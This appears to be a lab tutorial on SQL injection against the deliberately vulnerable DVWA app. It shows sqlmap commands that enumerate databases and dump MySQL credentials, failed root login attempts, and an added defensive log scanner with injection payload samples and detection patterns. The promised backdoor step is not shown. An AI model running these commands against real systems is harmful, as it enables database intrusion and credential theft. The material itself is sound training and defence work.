Now I will explain how to install a backdoor in the database through SQL injection. For this practice, I use DVWA as the web application. DVWA is a ready-made web application with SQL Injection and SQL Injection (Blind) exercises.
First, I choose SQL Injection as my target. In the user ID form, I just type admin and click Submit, but nothing happens. Then I copy the address (from the site after I submit admin as the user ID). I use sqlmap and try this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"
But this fails to get the database. Then I try Tamper Data from the browser. From Tamper Data, I get the cookie and copy it. With sqlmap, I scan again with this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"
From the result of the command above, I can see that the parameter id is vulnerable and might be injectable.
Then I try to enumerate the DBMS databases with this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4" --dbs
From the result above, there are 10 databases. Then I try to search for the users and passwords from MySQL with this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4" --users --passwords
We can see that mysql doesn't have a password (null). After that, I try this command:
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101
then:
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root
and then:
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.101 -u root -p
But with the commands above, I can't get access to MySQL on the target.
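For the defender's side of the scans above, here is an added example (not part of the original post) that flags this kind of traffic in a web server access log. The log lines, timestamps, payload strings, rule names and the scan() helper are all constructed for illustration; only the DVWA path and the id parameter come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines; times, payloads and agents are made up.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Feb/2012:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/10.0"
192.168.56.1 - - [10/Feb/2012:10:03:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=admin%27%20AND%205821%3D5821%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 4380 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.168.56.1 - - [10/Feb/2012:10:03:41 +0700] "GET /dvwa/vulnerabilities/sqli/?id=admin%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23&Submit=Submit HTTP/1.1" 200 4380 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/10.0"
192.168.56.1 - - [10/Feb/2012:10:05:00 +0700] "GET /dvwa/index.php HTTP/1.1" 200 5012 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/10.0"
"""

# client, timestamp, method, request target, status, user agent
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Patterns applied to the URL-decoded parameter value.
RULES = [
    ("union-select", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("boolean-tautology", re.compile(r"['\"]\s*(and|or)\s+['\"\d]", re.I)),
    ("sql-comment", re.compile(r"(--\s|#|/\*)")),
    ("time-or-schema-probe", re.compile(r"\b(sleep|benchmark)\s*\(|information_schema", re.I)),
]

def scan(log_text, param="id"):
    """Return (client, path, reasons) for each request that looks like SQL injection probing."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        client, _when, _method, target, _status, agent = m.groups()
        url = urlsplit(target)
        reasons = []
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap-user-agent")
        # parse_qs percent-decodes the value, so encoded quotes and spaces are seen in clear
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reasons += [name for name, rx in RULES if rx.search(value)]
        if reasons:
            findings.append((client, url.path, reasons))
    return findings

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, ",".join(reasons))
```

The user-agent check only catches a scanner left on its defaults, so the parameter rules carry the detection. The underlying fixes are a parameterized query behind the id field and a password on the MySQL root account that the scan reported as null.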